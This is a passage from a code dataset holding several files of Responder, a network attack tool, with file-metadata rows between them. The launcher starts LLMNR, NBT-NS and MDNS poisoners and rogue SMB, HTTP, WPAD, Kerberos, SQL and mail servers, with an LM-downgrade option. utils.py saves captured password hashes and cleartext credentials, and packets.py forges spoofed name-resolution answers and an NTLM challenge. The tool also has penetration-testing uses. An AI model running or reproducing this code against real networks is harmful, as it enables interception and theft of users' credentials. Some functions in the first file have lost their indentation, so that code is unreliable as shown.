				self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Bind_To+'\0')
			except Exception:
				# Best effort: fall back to default binding if the option is
				# unavailable or denied. (Was a bare except, which also
				# swallowed KeyboardInterrupt/SystemExit.)
				pass
		UDPServer.server_bind(self)
class ThreadingTCPServer(ThreadingMixIn, TCPServer):
	"""TCP server handling each request in its own thread.

	On supported OSes the socket is pinned to the configured interface via
	socket option 25 (SO_BINDTODEVICE on Linux).
	"""
	def server_bind(self):
		if OsInterfaceIsSupported():
			try:
				self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Bind_To+'\0')
			except Exception:
				# Best effort; narrowed from a bare except so that
				# KeyboardInterrupt/SystemExit are not swallowed.
				pass
		TCPServer.server_bind(self)
class ThreadingUDPMDNSServer(ThreadingMixIn, UDPServer):
	"""Threaded UDP server that joins the mDNS multicast group 224.0.0.251."""
	def server_bind(self):
		MADDR = "224.0.0.251"
		self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
		self.socket.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 255)
		# Join the mDNS group on the configured interface. (setsockopt returns
		# None; the old unused 'Join =' binding has been dropped.)
		self.socket.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, socket.inet_aton(MADDR) + settings.Config.IP_aton)
		if OsInterfaceIsSupported():
			try:
				self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Bind_To+'\0')
			except Exception:
				# Best effort interface pinning; narrowed from a bare except.
				pass
		UDPServer.server_bind(self)
class ThreadingUDPLLMNRServer(ThreadingMixIn, UDPServer):
	"""Threaded UDP server that joins the LLMNR multicast group 224.0.0.252."""
	def server_bind(self):
		MADDR = "224.0.0.252"
		self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
		self.socket.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 255)
		# Join the LLMNR group on the configured interface. (setsockopt returns
		# None; the old unused 'Join =' binding has been dropped.)
		self.socket.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, socket.inet_aton(MADDR) + settings.Config.IP_aton)
		if OsInterfaceIsSupported():
			try:
				self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Bind_To+'\0')
			except Exception:
				# Best effort interface pinning; narrowed from a bare except.
				pass
		UDPServer.server_bind(self)
# Allow quick restarts: rebind listening ports without waiting out TIME_WAIT.
ThreadingUDPServer.allow_reuse_address = 1
ThreadingTCPServer.allow_reuse_address = 1
ThreadingUDPMDNSServer.allow_reuse_address = 1
ThreadingUDPLLMNRServer.allow_reuse_address = 1
def serve_thread_udp_broadcast(host, port, handler):
try:
server = ThreadingUDPServer(('', port), handler)
server.serve_forever()
except:
print color("[!] ", 1, 1) + "Error starting UDP server on port " + str(port) + ", check permissions or other servers running."
def serve_NBTNS_poisoner(host, port, handler):
	# NBT-NS requests arrive as broadcasts on UDP 137, so the generic
	# broadcast UDP server is sufficient.
	serve_thread_udp_broadcast(host, port, handler)
def serve_MDNS_poisoner(host, port, handler):
try:
server = ThreadingUDPMDNSServer((host, port), handler)
server.serve_forever()
except:
print color("[!] ", 1, 1) + "Error starting UDP server on port " + str(port) + ", check permissions or other servers running."
def serve_LLMNR_poisoner(host, port, handler):
try:
server = ThreadingUDPLLMNRServer((host, port), handler)
server.serve_forever()
except:
print color("[!] ", 1, 1) + "Error starting UDP server on port " + str(port) + ", check permissions or other servers running."
def serve_thread_udp(host, port, handler):
try:
if OsInterfaceIsSupported():
server = ThreadingUDPServer((settings.Config.Bind_To, port), handler)
server.serve_forever()
else:
server = ThreadingUDPServer((host, port), handler)
server.serve_forever()
except:
print color("[!] ", 1, 1) + "Error starting UDP server on port " + str(port) + ", check permissions or other servers running."
def serve_thread_tcp(host, port, handler):
try:
if OsInterfaceIsSupported():
server = ThreadingTCPServer((settings.Config.Bind_To, port), handler)
server.serve_forever()
else:
server = ThreadingTCPServer((host, port), handler)
server.serve_forever()
except:
print color("[!] ", 1, 1) + "Error starting TCP server on port " + str(port) + ", check permissions or other servers running."
def serve_thread_SSL(host, port, handler):
try:
cert = os.path.join(settings.Config.ResponderPATH, settings.Config.SSLCert)
key = os.path.join(settings.Config.ResponderPATH, settings.Config.SSLKey)
if OsInterfaceIsSupported():
server = ThreadingTCPServer((settings.Config.Bind_To, port), handler)
server.socket = ssl.wrap_socket(server.socket, certfile=cert, keyfile=key, server_side=True)
server.serve_forever()
else:
server = ThreadingTCPServer((host, port), handler)
server.socket = ssl.wrap_socket(server.socket, certfile=cert, keyfile=key, server_side=True)
server.serve_forever()
except:
print color("[!] ", 1, 1) + "Error starting SSL server on port " + str(port) + ", check permissions or other servers running."
def main():
	"""Start every enabled poisoner/server in its own daemon thread, then idle.

	Which servers start is driven by the flags settings.Config.populate()
	derived from Responder.conf and the CLI. Server modules are imported
	lazily so disabled protocols cost nothing. Ctrl-C exits cleanly.
	"""
	try:
		threads = []
		# Load (M)DNS, NBNS and LLMNR Poisoners
		from poisoners.LLMNR import LLMNR
		from poisoners.NBTNS import NBTNS
		from poisoners.MDNS import MDNS
		threads.append(Thread(target=serve_LLMNR_poisoner, args=('', 5355, LLMNR,)))
		threads.append(Thread(target=serve_MDNS_poisoner,  args=('', 5353, MDNS,)))
		threads.append(Thread(target=serve_NBTNS_poisoner, args=('', 137,  NBTNS,)))
		# Load Browser Listener
		from servers.Browser import Browser
		threads.append(Thread(target=serve_thread_udp_broadcast, args=('', 138, Browser,)))
		if settings.Config.HTTP_On_Off:
			from servers.HTTP import HTTP
			threads.append(Thread(target=serve_thread_tcp, args=('', 80, HTTP,)))
		if settings.Config.SSL_On_Off:
			from servers.HTTP import HTTPS
			threads.append(Thread(target=serve_thread_SSL, args=('', 443, HTTPS,)))
		if settings.Config.WPAD_On_Off:
			from servers.HTTP_Proxy import HTTP_Proxy
			threads.append(Thread(target=serve_thread_tcp, args=('', 3141, HTTP_Proxy,)))
		if settings.Config.SMB_On_Off:
			# --lm selects the LM-downgrade variant of the SMB server.
			if settings.Config.LM_On_Off:
				from servers.SMB import SMB1LM
				threads.append(Thread(target=serve_thread_tcp, args=('', 445, SMB1LM,)))
				threads.append(Thread(target=serve_thread_tcp, args=('', 139, SMB1LM,)))
			else:
				from servers.SMB import SMB1
				threads.append(Thread(target=serve_thread_tcp, args=('', 445, SMB1,)))
				threads.append(Thread(target=serve_thread_tcp, args=('', 139, SMB1,)))
		if settings.Config.Krb_On_Off:
			from servers.Kerberos import KerbTCP, KerbUDP
			threads.append(Thread(target=serve_thread_udp, args=('', 88, KerbUDP,)))
			threads.append(Thread(target=serve_thread_tcp, args=('', 88, KerbTCP,)))
		if settings.Config.SQL_On_Off:
			from servers.MSSQL import MSSQL
			threads.append(Thread(target=serve_thread_tcp, args=('', 1433, MSSQL,)))
		if settings.Config.FTP_On_Off:
			from servers.FTP import FTP
			threads.append(Thread(target=serve_thread_tcp, args=('', 21, FTP,)))
		if settings.Config.POP_On_Off:
			from servers.POP3 import POP3
			threads.append(Thread(target=serve_thread_tcp, args=('', 110, POP3,)))
		if settings.Config.LDAP_On_Off:
			from servers.LDAP import LDAP
			threads.append(Thread(target=serve_thread_tcp, args=('', 389, LDAP,)))
		if settings.Config.SMTP_On_Off:
			from servers.SMTP import ESMTP
			threads.append(Thread(target=serve_thread_tcp, args=('', 25,  ESMTP,)))
			threads.append(Thread(target=serve_thread_tcp, args=('', 587, ESMTP,)))
		if settings.Config.IMAP_On_Off:
			from servers.IMAP import IMAP
			threads.append(Thread(target=serve_thread_tcp, args=('', 143, IMAP,)))
		if settings.Config.DNS_On_Off:
			from servers.DNS import DNS, DNSTCP
			threads.append(Thread(target=serve_thread_udp, args=('', 53, DNS,)))
			threads.append(Thread(target=serve_thread_tcp, args=('', 53, DNSTCP,)))
		# Daemon threads: the process exits as soon as this main thread does.
		for thread in threads:
			thread.setDaemon(True)
			thread.start()
		print color('[+]', 2, 1) + " Listening for events..."
		# Idle loop; all real work happens in the server threads.
		while True:
			time.sleep(1)
	except KeyboardInterrupt:
		sys.exit("\r%s Exiting..." % color('[+]', 2, 1))
# Entry point when run as a script (module-level CLI parsing already ran on import).
if __name__ == '__main__':
	main()
| 11,158 | Python | .py | 215 | 48.874419 | 240 | 0.731607 | SpiderLabs/Responder | 4,450 | 1,663 | 44 | GPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,387 | odict.py | SpiderLabs_Responder/odict.py | #!/usr/bin/env python
# This file is part of Responder
# Original work by Laurent Gaffie - Trustwave Holdings
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from UserDict import DictMixin
class OrderedDict(dict, DictMixin):
	"""Dictionary that remembers insertion order (pre-2.7 backport recipe).

	Order is kept in a circular doubly linked list of nodes ``[key, prev,
	next]``: ``self.__end`` is the sentinel node and ``self.__map`` maps each
	key to its node, giving O(1) insertion and deletion.
	"""
	def __init__(self, *args, **kwds):
		if len(args) > 1:
			raise TypeError('expected at most 1 arguments, got %d' % len(args))
		try:
			# Only build the linked-list bookkeeping on first initialisation.
			self.__end
		except AttributeError:
			self.clear()
		self.update(*args, **kwds)
	def clear(self):
		# Sentinel node: [None, prev, next], initially pointing at itself.
		self.__end = end = []
		end += [None, end, end]
		self.__map = {}                 # key -> [key, prev, next] node
		dict.clear(self)
	def __setitem__(self, key, value):
		if key not in self:
			# New key: link a node just before the sentinel (i.e. at the end).
			end = self.__end
			curr = end[1]
			curr[2] = end[1] = self.__map[key] = [key, curr, end]
		dict.__setitem__(self, key, value)
	def __delitem__(self, key):
		dict.__delitem__(self, key)
		# Unlink the node from the order list.
		key, prev, next = self.__map.pop(key)
		prev[2] = next
		next[1] = prev
	def __iter__(self):
		# Walk the linked list forward from the sentinel.
		end = self.__end
		curr = end[2]
		while curr is not end:
			yield curr[0]
			curr = curr[2]
	def __reversed__(self):
		# Walk the linked list backward from the sentinel.
		end = self.__end
		curr = end[1]
		while curr is not end:
			yield curr[0]
			curr = curr[1]
	def popitem(self, last=True):
		"""Remove and return a (key, value) pair; LIFO if *last*, else FIFO."""
		if not self:
			raise KeyError('dictionary is empty')
		if last:
			key = reversed(self).next()
		else:
			key = iter(self).next()
		value = self.pop(key)
		return key, value
	def __reduce__(self):
		# Pickle support: drop the (unpicklable, self-referential) linked list,
		# snapshot the instance dict, then restore the bookkeeping.
		items = [[k, self[k]] for k in self]
		tmp = self.__map, self.__end
		del self.__map, self.__end
		inst_dict = vars(self).copy()
		self.__map, self.__end = tmp
		if inst_dict:
			return self.__class__, (items,), inst_dict
		return self.__class__, (items,)
	def keys(self):
		return list(self)
	# Generic implementations derived from the methods above.
	setdefault = DictMixin.setdefault
	update = DictMixin.update
	pop = DictMixin.pop
	values = DictMixin.values
	items = DictMixin.items
	iterkeys = DictMixin.iterkeys
	itervalues = DictMixin.itervalues
	iteritems = DictMixin.iteritems
	def __repr__(self):
		if not self:
			return '%s()' % (self.__class__.__name__,)
		return '%s(%r)' % (self.__class__.__name__, self.items())
	def copy(self):
		return self.__class__(self)
	@classmethod
	def fromkeys(cls, iterable, value=None):
		d = cls()
		for key in iterable:
			d[key] = value
		return d
	def __eq__(self, other):
		# Two OrderedDicts are equal only if contents AND order match;
		# against a plain dict, fall back to order-insensitive comparison.
		if isinstance(other, OrderedDict):
			return len(self)==len(other) and \
				min(p==q for p, q in zip(self.items(), other.items()))
		return dict.__eq__(self, other)
	def __ne__(self, other):
		return not self == other
| 3,516 | Python | .py | 101 | 27.207921 | 79 | 0.580171 | SpiderLabs/Responder | 4,450 | 1,663 | 44 | GPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,388 | utils.py | SpiderLabs_Responder/utils.py | #!/usr/bin/env python
# This file is part of Responder
# Original work by Laurent Gaffie - Trustwave Holdings
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import os
import sys
import re
import logging
import socket
import time
import settings
try:
import sqlite3
except:
print "[!] Please install python-sqlite3 extension."
sys.exit(0)
def color(txt, code = 1, modifier = 0):
if txt.startswith('[*]'):
settings.Config.PoisonersLogger.warning(txt)
elif 'Analyze' in txt:
settings.Config.AnalyzeLogger.warning(txt)
if os.name == 'nt': # No colors for windows...
return txt
return "\033[%d;3%dm%s\033[0m" % (modifier, code, txt)
def text(txt):
logging.info(txt)
if os.name == 'nt':
return txt
return '\r' + re.sub(r'\[([^]]*)\]', "\033[1;34m[\\1]\033[0m", txt)
def IsOnTheSameSubnet(ip, net):
net += '/24'
ipaddr = int(''.join([ '%02x' % int(x) for x in ip.split('.') ]), 16)
netstr, bits = net.split('/')
netaddr = int(''.join([ '%02x' % int(x) for x in netstr.split('.') ]), 16)
mask = (0xffffffff << (32 - int(bits))) & 0xffffffff
return (ipaddr & mask) == (netaddr & mask)
def RespondToThisIP(ClientIp):
if ClientIp.startswith('127.0.0.'):
return False
elif settings.Config.AutoIgnore and ClientIp in settings.Config.AutoIgnoreList:
print color('[*]', 3, 1), 'Received request from auto-ignored client %s, not answering.' % ClientIp
return False
elif settings.Config.RespondTo and ClientIp not in settings.Config.RespondTo:
return False
elif ClientIp in settings.Config.RespondTo or settings.Config.RespondTo == []:
if ClientIp not in settings.Config.DontRespondTo:
return True
return False
def RespondToThisName(Name):
if settings.Config.RespondToName and Name.upper() not in settings.Config.RespondToName:
return False
elif Name.upper() in settings.Config.RespondToName or settings.Config.RespondToName == []:
if Name.upper() not in settings.Config.DontRespondToName:
return True
return False
def RespondToThisHost(ClientIp, Name):
return RespondToThisIP(ClientIp) and RespondToThisName(Name)
def OsInterfaceIsSupported():
if settings.Config.Interface != "Not set":
return not IsOsX()
return False
def IsOsX():
return sys.platform == "darwin"
def FindLocalIP(Iface, OURIP):
if Iface == 'ALL':
return '0.0.0.0'
try:
if IsOsX():
return OURIP
elif OURIP == None:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.setsockopt(socket.SOL_SOCKET, 25, Iface+'\0')
s.connect(("127.0.0.1",9))#RFC 863
ret = s.getsockname()[0]
s.close()
return ret
return OURIP
except socket.error:
print color("[!] Error: %s: Interface not found" % Iface, 1)
sys.exit(-1)
# Function used to write captured hashs to a file.
def WriteData(outfile, data, user):
logging.info("[*] Captured Hash: %s" % data)
if not os.path.isfile(outfile):
with open(outfile,"w") as outf:
outf.write(data + '\n')
return
with open(outfile,"r") as filestr:
if re.search(user.encode('hex'), filestr.read().encode('hex')):
return False
elif re.search(re.escape("$"), user):
return False
with open(outfile,"a") as outf2:
outf2.write(data + '\n')
def SaveToDb(result):
# Creating the DB if it doesn't exist
if not os.path.exists(settings.Config.DatabaseFile):
cursor = sqlite3.connect(settings.Config.DatabaseFile)
cursor.execute('CREATE TABLE responder (timestamp varchar(32), module varchar(16), type varchar(16), client varchar(32), hostname varchar(32), user varchar(32), cleartext varchar(128), hash varchar(512), fullhash varchar(512))')
cursor.commit()
cursor.close()
for k in [ 'module', 'type', 'client', 'hostname', 'user', 'cleartext', 'hash', 'fullhash' ]:
if not k in result:
result[k] = ''
if len(result['user']) < 2:
return
if len(result['cleartext']):
fname = '%s-%s-ClearText-%s.txt' % (result['module'], result['type'], result['client'])
else:
fname = '%s-%s-%s.txt' % (result['module'], result['type'], result['client'])
logfile = os.path.join(settings.Config.ResponderPATH, 'logs', fname)
cursor = sqlite3.connect(settings.Config.DatabaseFile)
cursor.text_factory = sqlite3.Binary # We add a text factory to support different charsets
res = cursor.execute("SELECT COUNT(*) AS count FROM responder WHERE module=? AND type=? AND client=? AND LOWER(user)=LOWER(?)", (result['module'], result['type'], result['client'], result['user']))
(count,) = res.fetchone()
if not count:
with open(logfile,"a") as outf:
if len(result['cleartext']): # If we obtained cleartext credentials, write them to file
outf.write('%s:%s\n' % (result['user'].encode('utf8', 'replace'), result['cleartext'].encode('utf8', 'replace')))
else: # Otherwise, write JtR-style hash string to file
outf.write(result['fullhash'].encode('utf8', 'replace') + '\n')
cursor.execute("INSERT INTO responder VALUES(datetime('now'), ?, ?, ?, ?, ?, ?, ?, ?)", (result['module'], result['type'], result['client'], result['hostname'], result['user'], result['cleartext'], result['hash'], result['fullhash']))
cursor.commit()
if not count or settings.Config.Verbose: # Print output
if len(result['client']):
print text("[%s] %s Client : %s" % (result['module'], result['type'], color(result['client'], 3)))
if len(result['hostname']):
print text("[%s] %s Hostname : %s" % (result['module'], result['type'], color(result['hostname'], 3)))
if len(result['user']):
print text("[%s] %s Username : %s" % (result['module'], result['type'], color(result['user'], 3)))
# Bu order of priority, print cleartext, fullhash, or hash
if len(result['cleartext']):
print text("[%s] %s Password : %s" % (result['module'], result['type'], color(result['cleartext'], 3)))
elif len(result['fullhash']):
print text("[%s] %s Hash : %s" % (result['module'], result['type'], color(result['fullhash'], 3)))
elif len(result['hash']):
print text("[%s] %s Hash : %s" % (result['module'], result['type'], color(result['hash'], 3)))
# Appending auto-ignore list if required
# Except if this is a machine account's hash
if settings.Config.AutoIgnore and not result['user'].endswith('$'):
settings.Config.AutoIgnoreList.append(result['client'])
print color('[*] Adding client %s to auto-ignore list' % result['client'], 4, 1)
else:
print color('[*]', 3, 1), 'Skipping previously captured hash for %s' % result['user']
cursor.execute("UPDATE responder SET timestamp=datetime('now') WHERE user=? AND client=?", (result['user'], result['client']))
cursor.commit()
cursor.close()
def Parse_IPV6_Addr(data):
if data[len(data)-4:len(data)][1] =="\x1c":
return False
elif data[len(data)-4:len(data)] == "\x00\x01\x00\x01":
return True
elif data[len(data)-4:len(data)] == "\x00\xff\x00\x01":
return True
return False
def Decode_Name(nbname): #From http://code.google.com/p/dpkt/ with author's permission.
try:
from string import printable
if len(nbname) != 32:
return nbname
l = []
for i in range(0, 32, 2):
l.append(chr(((ord(nbname[i]) - 0x41) << 4) | ((ord(nbname[i+1]) - 0x41) & 0xf)))
return filter(lambda x: x in printable, ''.join(l).split('\x00', 1)[0].replace(' ', ''))
except:
return "Illegal NetBIOS name"
def NBT_NS_Role(data):
return {
"\x41\x41\x00":"Workstation/Redirector",
"\x42\x4c\x00":"Domain Master Browser",
"\x42\x4d\x00":"Domain Controller",
"\x42\x4e\x00":"Local Master Browser",
"\x42\x4f\x00":"Browser Election",
"\x43\x41\x00":"File Server",
"\x41\x42\x00":"Browser",
}.get(data, 'Service not known')
def banner():
banner = "\n".join([
' __',
' .----.-----.-----.-----.-----.-----.--| |.-----.----.',
' | _| -__|__ --| _ | _ | | _ || -__| _|',
' |__| |_____|_____| __|_____|__|__|_____||_____|__|',
' |__|'
])
print banner
print "\n \033[1;33mNBT-NS, LLMNR & MDNS %s\033[0m" % settings.__version__
print ""
print " Author: Laurent Gaffie (laurent.gaffie@gmail.com)"
print " To kill this script hit CRTL-C"
print ""
def StartupMessage():
enabled = color('[ON]', 2, 1)
disabled = color('[OFF]', 1, 1)
print ""
print color("[+] ", 2, 1) + "Poisoners:"
print ' %-27s' % "LLMNR" + enabled
print ' %-27s' % "NBT-NS" + enabled
print ' %-27s' % "DNS/MDNS" + enabled
print ""
print color("[+] ", 2, 1) + "Servers:"
print ' %-27s' % "HTTP server" + (enabled if settings.Config.HTTP_On_Off else disabled)
print ' %-27s' % "HTTPS server" + (enabled if settings.Config.SSL_On_Off else disabled)
print ' %-27s' % "WPAD proxy" + (enabled if settings.Config.WPAD_On_Off else disabled)
print ' %-27s' % "SMB server" + (enabled if settings.Config.SMB_On_Off else disabled)
print ' %-27s' % "Kerberos server" + (enabled if settings.Config.Krb_On_Off else disabled)
print ' %-27s' % "SQL server" + (enabled if settings.Config.SQL_On_Off else disabled)
print ' %-27s' % "FTP server" + (enabled if settings.Config.FTP_On_Off else disabled)
print ' %-27s' % "IMAP server" + (enabled if settings.Config.IMAP_On_Off else disabled)
print ' %-27s' % "POP3 server" + (enabled if settings.Config.POP_On_Off else disabled)
print ' %-27s' % "SMTP server" + (enabled if settings.Config.SMTP_On_Off else disabled)
print ' %-27s' % "DNS server" + (enabled if settings.Config.DNS_On_Off else disabled)
print ' %-27s' % "LDAP server" + (enabled if settings.Config.LDAP_On_Off else disabled)
print ""
print color("[+] ", 2, 1) + "HTTP Options:"
print ' %-27s' % "Always serving EXE" + (enabled if settings.Config.Serve_Always else disabled)
print ' %-27s' % "Serving EXE" + (enabled if settings.Config.Serve_Exe else disabled)
print ' %-27s' % "Serving HTML" + (enabled if settings.Config.Serve_Html else disabled)
print ' %-27s' % "Upstream Proxy" + (enabled if settings.Config.Upstream_Proxy else disabled)
#print ' %-27s' % "WPAD script" + settings.Config.WPAD_Script
print ""
print color("[+] ", 2, 1) + "Poisoning Options:"
print ' %-27s' % "Analyze Mode" + (enabled if settings.Config.AnalyzeMode else disabled)
print ' %-27s' % "Force WPAD auth" + (enabled if settings.Config.Force_WPAD_Auth else disabled)
print ' %-27s' % "Force Basic Auth" + (enabled if settings.Config.Basic else disabled)
print ' %-27s' % "Force LM downgrade" + (enabled if settings.Config.LM_On_Off == True else disabled)
print ' %-27s' % "Fingerprint hosts" + (enabled if settings.Config.Finger_On_Off == True else disabled)
print ""
print color("[+] ", 2, 1) + "Generic Options:"
print ' %-27s' % "Responder NIC" + color('[%s]' % settings.Config.Interface, 5, 1)
print ' %-27s' % "Responder IP" + color('[%s]' % settings.Config.Bind_To, 5, 1)
print ' %-27s' % "Challenge set" + color('[%s]' % settings.Config.NumChal, 5, 1)
if settings.Config.Upstream_Proxy:
print ' %-27s' % "Upstream Proxy" + color('[%s]' % settings.Config.Upstream_Proxy, 5, 1)
if len(settings.Config.RespondTo):
print ' %-27s' % "Respond To" + color(str(settings.Config.RespondTo), 5, 1)
if len(settings.Config.RespondToName):
print ' %-27s' % "Respond To Names" + color(str(settings.Config.RespondToName), 5, 1)
if len(settings.Config.DontRespondTo):
print ' %-27s' % "Don't Respond To" + color(str(settings.Config.DontRespondTo), 5, 1)
if len(settings.Config.DontRespondToName):
print ' %-27s' % "Don't Respond To Names" + color(str(settings.Config.DontRespondToName), 5, 1)
print "\n\n"
# Useful for debugging
def hexdump(src, l=0x16):
res = []
sep = '.'
src = str(src)
for i in range(0, len(src), l):
s = src[i:i+l]
hexa = ''
for h in range(0,len(s)):
if h == l/2:
hexa += ' '
h = s[h]
if not isinstance(h, int):
h = ord(h)
h = hex(h).replace('0x','')
if len(h) == 1:
h = '0'+h
hexa += h + ' '
hexa = hexa.strip(' ')
text = ''
for c in s:
if not isinstance(c, int):
c = ord(c)
if 0x20 <= c < 0x7F:
text += chr(c)
else:
text += sep
res.append(('%08X: %-'+str(l*(2+1)+1)+'s |%s|') % (i, hexa, text))
return '\n'.join(res) | 12,730 | Python | .py | 283 | 42.300353 | 236 | 0.659291 | SpiderLabs/Responder | 4,450 | 1,663 | 44 | GPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,389 | packets.py | SpiderLabs_Responder/packets.py | #!/usr/bin/env python
# This file is part of Responder
# Original work by Laurent Gaffie - Trustwave Holdings
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import struct
import settings
from base64 import b64decode, b64encode
from odict import OrderedDict
# Packet class handling all packet generation (see odict.py).
class Packet():
fields = OrderedDict([
("data", ""),
])
def __init__(self, **kw):
self.fields = OrderedDict(self.__class__.fields)
for k,v in kw.items():
if callable(v):
self.fields[k] = v(self.fields[k])
else:
self.fields[k] = v
def __str__(self):
return "".join(map(str, self.fields.values()))
# NBT Answer Packet
class NBT_Ans(Packet):
fields = OrderedDict([
("Tid", ""),
("Flags", "\x85\x00"),
("Question", "\x00\x00"),
("AnswerRRS", "\x00\x01"),
("AuthorityRRS", "\x00\x00"),
("AdditionalRRS", "\x00\x00"),
("NbtName", ""),
("Type", "\x00\x20"),
("Classy", "\x00\x01"),
("TTL", "\x00\x00\x00\xa5"),
("Len", "\x00\x06"),
("Flags1", "\x00\x00"),
("IP", "\x00\x00\x00\x00"),
])
def calculate(self,data):
self.fields["Tid"] = data[0:2]
self.fields["NbtName"] = data[12:46]
self.fields["IP"] = settings.Config.IP_aton
# DNS Answer Packet
class DNS_Ans(Packet):
fields = OrderedDict([
("Tid", ""),
("Flags", "\x80\x10"),
("Question", "\x00\x01"),
("AnswerRRS", "\x00\x01"),
("AuthorityRRS", "\x00\x00"),
("AdditionalRRS", "\x00\x00"),
("QuestionName", ""),
("QuestionNameNull", "\x00"),
("Type", "\x00\x01"),
("Class", "\x00\x01"),
("AnswerPointer", "\xc0\x0c"),
("Type1", "\x00\x01"),
("Class1", "\x00\x01"),
("TTL", "\x00\x00\x00\x1e"), #30 secs, don't mess with their cache for too long..
("IPLen", "\x00\x04"),
("IP", "\x00\x00\x00\x00"),
])
def calculate(self,data):
self.fields["Tid"] = data[0:2]
self.fields["QuestionName"] = ''.join(data[12:].split('\x00')[:1])
self.fields["IP"] = settings.Config.IP_aton
self.fields["IPLen"] = struct.pack(">h",len(self.fields["IP"]))
# LLMNR Answer Packet
class LLMNR_Ans(Packet):
fields = OrderedDict([
("Tid", ""),
("Flags", "\x80\x00"),
("Question", "\x00\x01"),
("AnswerRRS", "\x00\x01"),
("AuthorityRRS", "\x00\x00"),
("AdditionalRRS", "\x00\x00"),
("QuestionNameLen", "\x09"),
("QuestionName", ""),
("QuestionNameNull", "\x00"),
("Type", "\x00\x01"),
("Class", "\x00\x01"),
("AnswerNameLen", "\x09"),
("AnswerName", ""),
("AnswerNameNull", "\x00"),
("Type1", "\x00\x01"),
("Class1", "\x00\x01"),
("TTL", "\x00\x00\x00\x1e"),##Poison for 30 sec.
("IPLen", "\x00\x04"),
("IP", "\x00\x00\x00\x00"),
])
def calculate(self):
self.fields["IP"] = settings.Config.IP_aton
self.fields["IPLen"] = struct.pack(">h",len(self.fields["IP"]))
self.fields["AnswerNameLen"] = struct.pack(">h",len(self.fields["AnswerName"]))[1]
self.fields["QuestionNameLen"] = struct.pack(">h",len(self.fields["QuestionName"]))[1]
# MDNS Answer Packet
class MDNS_Ans(Packet):
fields = OrderedDict([
("Tid", "\x00\x00"),
("Flags", "\x84\x00"),
("Question", "\x00\x00"),
("AnswerRRS", "\x00\x01"),
("AuthorityRRS", "\x00\x00"),
("AdditionalRRS", "\x00\x00"),
("AnswerName", ""),
("AnswerNameNull", "\x00"),
("Type", "\x00\x01"),
("Class", "\x00\x01"),
("TTL", "\x00\x00\x00\x78"),##Poison for 2mn.
("IPLen", "\x00\x04"),
("IP", "\x00\x00\x00\x00"),
])
def calculate(self):
self.fields["IPLen"] = struct.pack(">h",len(self.fields["IP"]))
##### HTTP Packets #####
class NTLM_Challenge(Packet):
fields = OrderedDict([
("Signature", "NTLMSSP"),
("SignatureNull", "\x00"),
("MessageType", "\x02\x00\x00\x00"),
("TargetNameLen", "\x06\x00"),
("TargetNameMaxLen", "\x06\x00"),
("TargetNameOffset", "\x38\x00\x00\x00"),
("NegoFlags", "\x05\x02\x89\xa2"),
("ServerChallenge", ""),
("Reserved", "\x00\x00\x00\x00\x00\x00\x00\x00"),
("TargetInfoLen", "\x7e\x00"),
("TargetInfoMaxLen", "\x7e\x00"),
("TargetInfoOffset", "\x3e\x00\x00\x00"),
("NTLMOsVersion", "\x05\x02\xce\x0e\x00\x00\x00\x0f"),
("TargetNameStr", "SMB"),
("Av1", "\x02\x00"),#nbt name
("Av1Len", "\x06\x00"),
("Av1Str", "SMB"),
("Av2", "\x01\x00"),#Server name
("Av2Len", "\x14\x00"),
("Av2Str", "SMB-TOOLKIT"),
("Av3", "\x04\x00"),#Full Domain name
("Av3Len", "\x12\x00"),
("Av3Str", "smb.local"),
("Av4", "\x03\x00"),#Full machine domain name
("Av4Len", "\x28\x00"),
("Av4Str", "server2003.smb.local"),
("Av5", "\x05\x00"),#Domain Forest Name
("Av5Len", "\x12\x00"),
("Av5Str", "smb.local"),
("Av6", "\x00\x00"),#AvPairs Terminator
("Av6Len", "\x00\x00"),
])
def calculate(self):
# First convert to unicode
self.fields["TargetNameStr"] = self.fields["TargetNameStr"].encode('utf-16le')
self.fields["Av1Str"] = self.fields["Av1Str"].encode('utf-16le')
self.fields["Av2Str"] = self.fields["Av2Str"].encode('utf-16le')
self.fields["Av3Str"] = self.fields["Av3Str"].encode('utf-16le')
self.fields["Av4Str"] = self.fields["Av4Str"].encode('utf-16le')
self.fields["Av5Str"] = self.fields["Av5Str"].encode('utf-16le')
# Then calculate
